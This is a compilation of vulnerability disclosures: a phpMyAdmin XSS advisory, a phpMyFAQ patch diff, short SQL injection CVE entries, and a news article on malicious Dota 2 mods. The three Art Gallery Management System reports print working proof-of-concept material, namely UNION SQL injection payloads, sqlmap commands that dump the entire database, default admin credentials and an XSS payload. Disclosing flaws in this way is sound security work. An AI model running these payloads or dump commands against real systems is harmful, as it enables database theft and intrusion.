In phpMyAdmin before 4.9.11 and 5.x before 5.2.1, an authenticated user can trigger XSS by uploading a crafted .sql file through the drag-and-drop interface.

**Announcement-ID:** PMASA-2023-1

**Date:** 2023-02-07

**Summary**

XSS vulnerability in drag-and-drop upload

**Description**

An XSS vulnerability has been discovered where an authenticated user can trigger an XSS attack by uploading a specially-crafted .sql file through the drag-and-drop interface.

**Severity**

We consider this vulnerability to be of moderate severity.

**Mitigation factor**

By disabling the configuration directive \`$cfg\['enable\_drag\_drop\_import'\]\`, users will be unable to use the drag and drop upload which would protect against the vulnerability.

**Affected Versions**

phpMyAdmin versions prior to 4.9.11 and 5.2.1 are affected. The vulnerability has existed since release version 4.3.0.

**Solution**

Upgrade to phpMyAdmin 5.1.2 or 4.9.11 or newer or apply patch listed below.

**References**

Thanks to Erol Guven for reporting this vulnerability.

Assigned CVE ids: Not yet assigned

CWE ids: CWE-661

**Patches**

The following commits have been made on the 4.9 branch to fix this issue:

*   53f70fd7f3b388639922e6cc1ca51fbe890c91cc

The following commits have been made on the 5.2 branch to fix this issue:

*   efa2406695551667f726497750d3db91fb6f662e

**More information**

For further information and in case of questions, please contact the phpMyAdmin team. Our website is phpmyadmin.net.

CVE-2023-25727: Security - PMASA-2023-1

Uncaught Exception in GitHub repository thorsten/phpmyfaq prior to 3.1.11.

@@ -114,41 +114,46 @@ $message .= sprintf('<p class="alert alert-danger">%s</p>', $PMF\_LANG\['ad\_user\_error\_noId'\]); } else { $userData = \[\]; $userData\['display\_name'\] = Filter::filterInput(INPUT\_POST, 'display\_name', FILTER\_UNSAFE\_RAW, ''); $userData\['email'\] = Filter::filterInput(INPUT\_POST, 'email', FILTER\_VALIDATE\_EMAIL, ''); $userData\['last\_modified'\] = Filter::filterInput(INPUT\_POST, 'last\_modified', FILTER\_UNSAFE\_RAW, ''); $userData\['display\_name'\] = Filter::filterInput(INPUT\_POST, 'display\_name', FILTER\_UNSAFE\_RAW); $userData\['email'\] = Filter::filterInput(INPUT\_POST, 'email', FILTER\_VALIDATE\_EMAIL); $userData\['last\_modified'\] = Filter::filterInput(INPUT\_POST, 'last\_modified', FILTER\_UNSAFE\_RAW); $userStatus = Filter::filterInput(INPUT\_POST, 'user\_status', FILTER\_UNSAFE\_RAW, $defaultUserStatus); $isSuperAdmin = Filter::filterInput(INPUT\_POST, 'is\_superadmin', FILTER\_UNSAFE\_RAW); $isSuperAdmin = $isSuperAdmin === 'on';  
$user = new User($faqConfig); $user\->getUserById($userId, true); // Sanity check if (is\_null($userData\['email'\])) { $message .= sprintf('<p class="alert alert-danger">%s</p>', $PMF\_LANG\['err\_noMailAdress'\]); } else { $user = new User($faqConfig); $user\->getUserById($userId, true);  
$stats = $user\->getStatus(); $stats = $user\->getStatus();  
// set new password an send email if user is switched to active if ($stats == 'blocked' && $userStatus == 'active') { if (!$user\->activateUser()) { $userStatus = 'invalid\_status'; // set new password an send email if user is switched to active if ($stats == 'blocked' && $userStatus == 'active') { if (!$user\->activateUser()) { $userStatus = 'invalid\_status'; } } }  
// Set super-admin flag $user\->setSuperAdmin($isSuperAdmin);  
if ( !$user\->userdata\->set(array\_keys($userData), array\_values($userData)) || !$user\->setStatus($userStatus) ) { $message .= sprintf('<p class="alert alert-danger">%s</p>', $PMF\_LANG\['ad\_msg\_mysqlerr'\]); } else { $message .= sprintf( '<p class="alert alert-success">%s <strong>%s</strong> %s</p>', $PMF\_LANG\['ad\_msg\_savedsuc\_1'\], Strings::htmlentities($user\->getLogin(), ENT\_QUOTES), $PMF\_LANG\['ad\_msg\_savedsuc\_2'\] ); $message .= '<script>updateUser(' . $userId . ');</script>'; // Set super-admin flag $user\->setSuperAdmin($isSuperAdmin);  
if ( !$user\->userdata\->set(array\_keys($userData), array\_values($userData)) || !$user\->setStatus($userStatus) ) { $message .= sprintf('<p class="alert alert-danger">%s</p>', $PMF\_LANG\['ad\_msg\_mysqlerr'\]); } else { $message .= sprintf( '<p class="alert alert-success">%s <strong>%s</strong> %s</p>', $PMF\_LANG\['ad\_msg\_savedsuc\_1'\], Strings::htmlentities($user\->getLogin(), ENT\_QUOTES), $PMF\_LANG\['ad\_msg\_savedsuc\_2'\] ); $message .= '<script>updateUser(' . $userId . ');</script>'; } } } }

CVE-2023-0790: fix: added missing check on email address · thorsten/phpMyFAQ@f34d84d

A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. Affected is an unknown function of the component Login Page. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220644.

CVE-2023-0784

IBM Watson Knowledge Catalog on Cloud Pak for Data 4.5.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 237402.

  

**Summary**

IBM Watson Knowledge Catalog on Cloud Pak for Data is vulnerable to SQL injection. This vulnerability has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-41731  
**DESCRIPTION:**   IBM Watson Knowledge Catalog on Cloud Pak for Data is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database.  
CVSS Base score: 8.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/237402 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Watson Knowledge Catalog on-prem

4.5.x

  

**Remediation/Fixes**

Install IBM Watson Knowledge Catalog on Cloud Pak for Data 4.6.0 or higher

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

30 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"DSXDOC","label":"IBM Watson Studio and Knowledge Catalog"},"Component":"","Platform":\[{"code":"PF040","label":"RedHat OpenShift"}\],"Version":"4.5.x","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-41731: Security Bulletin: IBM Watson Knowledge Catalog on Cloud Pak for Data is vulnerable to SQL injection (CVE-2022-41731)

Improper Input Validation vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01.

CVE-2022-4557

A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects the function query of the file removeOrder.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220624.

CVE-2023-0781

Art Gallery Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the cid parameter at product.php.

\> \[Suggested description\] > Art Gallery Management System Project v1.0 was discovered to contain a > SQL injection vulnerability via the cid parameter at product.php. > > ------------------------------------------ > > \[Additional Information\] > Steps to Reproduce: > 1. Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu. > 2. Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown. > 3. Now inject the payload double single quote ('') in the "cid" parameter to merge the > database query and after sending this request the SQL query is successfully performed and the product is shown in the output. > 4. Now find how many columns are returned by the SQL query. this query will return 6 columns. > Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures > 5. for manually getting data from the database insert the below payload to see the user of the database. > payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs > 6. for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt". > 7. now to get all database data use the below "sqlmap" command to fetch all the data. > Command: sqlmap -r request.txt -p cid --dump-all --batch > > //////// request.txt file //////// > > GET /Art-Gallery-MS-PHP/product.php?cid=2&&artname=Serigraphs HTTP/1.1 > Host: localhost > sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=2&artname=Serigraphs > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL injection attacks can have serious consequences for both the website and its users. If an attacker is able to successfully inject malicious code into a database, they can potentially extract sensitive data such as passwords, credit card numbers, and personal information. This can result in the theft of sensitive data, as well as damage to the website's reputation and credibility. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23162.

CVE-2023-23162: CVE/CVE-2023-23162.txt at main · rahulpatwari/CVE

A reflected cross-site scripting (XSS) vulnerability in Art Gallery Management System Project v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the artname parameter under ART TYPE option in the navigation bar.

\> \[Suggested description\] > A reflected cross-site scripting (XSS) vulnerability in Art Gallery > Management System Project v1.0 allows attackers to execute arbitrary > web scripts or HTML via a crafted payload injected into the artname > parameter under ART TYPE option in the navigation bar. > > ------------------------------------------ > > \[Additional Information\] > Steps to Reproduce: > 1. Navigate to the Products page by clicking on "ART TYPE". > 4. Now insert the XSS payload and click on "artname" parameter in the URL and click on ENTER to submit the request. Payload: <img%20src=1%20onerror=alert(document.domain)> > 5. After clicking on ENTER the XSS payload is executed and the alert Pops up with the domain name. > > ############ Product Page Request ############ > > GET /Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E HTTP/1.1 > Host: localhost > Cache-Control: max-age=0 > sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Upgrade-Insecure-Requests: 1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 > Sec-Fetch-Site: none > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Accept-Encoding: gzip, deflate > Accept-Language: en-US,en;q=0.9 > Cookie: PHPSESSID=hub8pub9s5c1j18cva9594af3q > Connection: close > > ------------------------------------------ > > \[Vulnerability Type\] > Cross Site Scripting (XSS) > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project - Art Gallery Management System Project - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/product.php?cid=1&&artname=Sculptures > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > Cross-Site Scripting (XSS) is a type of vulnerability that allows an attacker to inject malicious code into a website. This code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, or to manipulate the content of the website for malicious purposes. > XSS attacks can we used to perform a variety of malicious actions including: > 1. Stealing sensitive information > 2. Redirecting the victim to another webpage > 3. Executing arbitrary code > 4. Manipulating the appearance of the website > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23161.

CVE-2023-23161: CVE/CVE-2023-23161.txt at main · rahulpatwari/CVE

Art Gallery Management System Project v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter.

\> \[Suggested description\] > Art Gallery Management System Project v1.0 was discovered to contain a > SQL injection vulnerability via the editid parameter. > > ------------------------------------------ > > \[Additional Information\] > Step To Reproduce: > > 1. navigate to admin login page and login with the valid username and password<admin:Test@123>. > URL: http://localhost/Art-Gallery-MS-PHP/admin/login.php > 2. Now navigate "Manage ART TYPE" by clicking on "ART TYPE" option on left side bar. > 3. Now click on any of the Art Type "Edit" button and you will redirect to the edit page of art type. > 4. Now insert a single quote ( ' ) on "editid" parameter to break the database query, you will see the output is not shows. > > 3. Now inject the payload double single quote ('') in the "editid" parameter to merge the > database query and after sending this request the SQL query is successfully performed and product is shows in the output. > > 4. Now find how many column are returns by the SQL query. this query will return 6 column. > Payload:editid=6%27order%20by%203%20--%20- > > 5. for manually get data of database insert the below payload to see the user of the database. > payload: editid=-6%27union%20all%20select%201,user(),3--%20- > > 6.now to get all database data use below "sqlmap" command to fetch all the data. > Command: sqlmap http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=6 --cookie="PHPSESSID=hub8pub9s5c1j18cva9594af3q" --dump-all --batch > > ------------------------------------------ > > \[Vulnerability Type\] > SQL Injection > > ------------------------------------------ > > \[Vendor of Product\] > https://phpgurukul.com/ > > ------------------------------------------ > > \[Affected Product Code Base\] > Art Gallery Management System Project in PHP - Art Gallery Management System Project in PHP - V 1.0 > > ------------------------------------------ > > \[Affected Component\] > http://localhost/Art-Gallery-MS-PHP/admin/edit-art-type-detail.php?editid=1 > > ------------------------------------------ > > \[Attack Type\] > Remote > > ------------------------------------------ > > \[Impact Code execution\] > true > > ------------------------------------------ > > \[Impact Escalation of Privileges\] > true > > ------------------------------------------ > > \[Impact Information Disclosure\] > true > > ------------------------------------------ > > \[Attack Vectors\] > SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. an attacker can go around authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database. > > SQL injection attacks can be used to perform a variety of malicious actions, including: > 1. Extracting sensitive data from the database, such as passwords, financial information, or personal information. > 2. Modifying or deleting data from the database, potentially causing incorrect results or system failures. > 3. Executing arbitrary commands on the database server, such as shutting down the server or creating new user accounts. > 4. Gaining unauthorized access to the underlying operating system and taking complete control of the server. > > ------------------------------------------ > > \[Reference\] > https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/ > https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip > > ------------------------------------------ > > \[Discoverer\] > Rahul Patwari Use CVE-2023-23163.

CVE-2023-23163: CVE/CVE-2023-23163.txt at main · rahulpatwari/CVE

Valve's unpatched JavaScript engine and incomplete modification vetting process for Steam-delivered mods led to user systems being backdoored.

A threat actor recently uploaded four "mods" containing malicious code into the catalog in the official Steam store that players of the popular Dota 2 online game use for downloading community-developed game additions and other custom items.

Mods, short for "modifications," offer in-game content that players create rather than the developers.

Users who installed the mods ended up with a backdoor on their systems that the threat actor used to download an exploit for a vulnerability (CVE-2021-38003) in the V8 open source JavaScript engine version present in a framework called Panorama that players use to develop custom items in Dota 2.

Researchers from Avast discovered the issue and reported it to Valve, the developer of the game. Valve immediately updated the game's code to a new (patched) version of V8, and took down the rogue game mods from its Steam online store. The gaming company — whose portfolio includes Counter-Strike, Left 4 Dead, and Day of Defeat — also notified the small handful of users who downloaded the backdoor about the issue and implemented unspecified "other measures" to reduce Dota 2's attack surface, Avast said.

Valve did not immediately respond to a Dark Reading request for comment.

**Taking Advantage of Dota 2's Customization Features**

The attack that Avast discovered is somewhat similar in approach to the numerous incidents where a threat actor has uploaded malicious applications to Google Play and Apple's App Store, or malicious code blocks to repositories like npm or PyPI.

In this case, the individual who uploaded the code to Valve's Steam store took advantage of the fact that Dota 2 allows players to customize the game in many ways. Dota's game engine gives anyone with even basic programming skills the ability to develop custom items such as wearables, loading screens, chat emojis, and even entire custom game modes — or new games, Avast said. They can then upload those custom items to the Steam store, which vets the offerings for unsuitable content, and then publishes them for other players to download and use. 

However, because the Steam vetting process is more focused on moderation than security, bad actors can sneak malicious code into the store without too much trouble, the researchers warned. "We believe the verification process exists mostly for moderation reasons to prevent inappropriate content from getting published," according to Avast's blog post. "There are many ways to hide a backdoor within a game mode, and it would be very time-consuming to attempt to detect them all during verification."

Boris Larin, lead security researcher at Kaspersky's global research and analysis team, says that while game companies are not directly responsible for malicious code embedded into third-party modifications, incidents like these still harm the company's reputation. This is especially true when modifications are distributed through special repositories owned by the game developer that may contain vulnerabilities.

"In this particular case, the timely updating of third-party components would have helped to protect the players," Larin says. "JavaScript engines and built-in Web browsers also require special attention as they often contain vulnerabilities that can be exploited for remote code execution."

**Gaming Industry Continues to Be a Massive Target**

The incident at Valve is the latest in a string of attacks that have targeted online gaming companies and players in recent years — and especially since the COVID-19 outbreak, when social distance mandates drove a surge in online gaming. In early January, attackers broke into Riot Games' systems and stole source code for the company's League of Legends and Teamfight Tactics games. The attackers demanded $10 million from Riot Games in return for not publicly leaking the source code. In another incident, an attacker breached systems at Rockstar Games last year and downloaded early footage of the next version of the company's popular Grand Theft Auto game.

A report that Akamai released last year showed a 167% increase in Web application attacks on player accounts and gaming companies last year. A plurality of these Web application attacks — 38% — involved local file inclusion attacks; 34% were SQL injection attacks, and 24% involved cross-site scripting. Akamai's survey also showed that the gaming industry accounted for some 37% of all distributed denial-of-service (DDoS) attacks, which was double that of the second-most-targeted sector.

Akamai, like others previously, attributed the major attacker interest in gaming to the highly lucrative nature of the industry as a whole, and to the billions of dollars that users spend via in-game microtransactions while playing games. In 2022, PwC pegged gaming industry revenues at $235.7 billion for the year. The consulting firm estimated that industry revenues will grow at some 8.4% through 2026 at least.

The attacks have put growing pressure on gaming companies to ramp up their security processes. Industry experts have previously noted how gaming companies that experience major security incidents face the risk of losing player trust and player engagement on their platforms.

"Gaming companies should regularly update and scan their systems and employ a comprehensive defensive concept that equips, informs, and guides their team in their fight against the most sophisticated and targeted cyberattacks," Larin says.

"All repositories, whether an app store, an open source package repository, or even game modification repositories, should be automatically checked for malicious content," he says. This should include static checks for obfuscated or dangerous functionality and scanning with an antivirus engine SDK, he notes.

Larin adds: "Open source code repository poisoning has become more widespread in recent years and its early detection can prevent larger incidents."

Tag

#sql